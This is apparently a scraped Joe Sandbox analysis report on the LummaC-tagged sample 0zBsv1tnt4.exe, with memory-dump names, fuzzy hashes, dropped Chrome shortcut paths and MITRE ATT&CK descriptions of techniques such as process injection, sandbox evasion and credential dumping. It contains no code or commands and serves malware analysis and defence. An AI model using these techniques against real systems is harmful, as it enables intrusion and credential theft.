Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39da684b5a53d84ee2df5bc3a3c31bd0b3b6f65dd227da1e6079b0867882882c
Instruction ID: 43449a346914568d782557bf2c5115bd913419e42b007ddf7363948aae636a44
Opcode Fuzzy Hash: 39da684b5a53d84ee2df5bc3a3c31bd0b3b6f65dd227da1e6079b0867882882c
Instruction Fuzzy Hash: 4801D1616442829BD344CB38CDA166BFBA1EB86364B08CB9DC45A8B796C638D842C795

Function 0095C805 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5486445ea1e2a43d4df3f042f079a46717ee1b793f057d4644b7337ffd8d23
Instruction ID: 05b9eef6204ed201caf7b911cb7bbb8990339c9a64e61ce9f4d6781bf46b89cd
Opcode Fuzzy Hash: ec5486445ea1e2a43d4df3f042f079a46717ee1b793f057d4644b7337ffd8d23
Instruction Fuzzy Hash: 8FC0123452A440DF82054F38DC0857EB374EB0B102F406406D417D3211CB21A501AB9D

Function 014F1775 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, Offset: 014EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_14e2000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b3dd2215debb27dd4b625c34823a3682dc9fd0ccbfea2def1354c2972223f1
Instruction ID: a9fbe2a7ef547f4dcbf3dbe0d61fc0938ed7b11f8b165201665e535975f5cec7
Opcode Fuzzy Hash: b2b3dd2215debb27dd4b625c34823a3682dc9fd0ccbfea2def1354c2972223f1
Instruction Fuzzy Hash: 88C04C4564E3E56FD307A7749D25EA53FB18E93A00B0F41E7C1888F1F3D1545919C3AA

Function 014F1775 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_14e2000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b3dd2215debb27dd4b625c34823a3682dc9fd0ccbfea2def1354c2972223f1
Instruction ID: a9fbe2a7ef547f4dcbf3dbe0d61fc0938ed7b11f8b165201665e535975f5cec7
Opcode Fuzzy Hash: b2b3dd2215debb27dd4b625c34823a3682dc9fd0ccbfea2def1354c2972223f1
Instruction Fuzzy Hash: 88C04C4564E3E56FD307A7749D25EA53FB18E93A00B0F41E7C1888F1F3D1545919C3AA

Function 009737D6 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7613632f377ae23a9aeb58b01ebb9066672718f928426ec8a8a9b5095fde035e
Instruction ID: 966562dcde67fb63f3a449e56c140e5dfcbfeac0ab6cdaee4827f8a14120c65e
Opcode Fuzzy Hash: 7613632f377ae23a9aeb58b01ebb9066672718f928426ec8a8a9b5095fde035e
Instruction Fuzzy Hash: 0EB092B0A5C2018A83088F04E140039AAB4628F701F30A41E904A63215C220C100AA88

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0zBsv1tnt4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Windows Analysis Report
0zBsv1tnt4.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre